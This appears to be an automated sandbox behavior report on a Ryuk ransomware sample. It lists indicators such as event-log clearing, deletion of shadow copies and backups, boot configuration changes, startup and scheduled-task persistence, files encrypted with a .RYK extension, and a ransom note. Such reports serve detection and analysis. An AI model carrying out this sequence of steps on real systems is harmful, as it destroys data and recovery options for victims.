N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\changelog.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.XLA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfxswt.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-hover.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ir.idl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\IEEE2006OfficeOnline.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_KMS_Client-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WordNaiveBayesCommandRanker.txt.[[email protected]].RYKCRYPT C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Unlock.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-hover.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription2-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-140.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateDCFiles_280x192.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\README_th_en_CA_v2.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-hover_32.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\PlayStore_icon.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hr.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
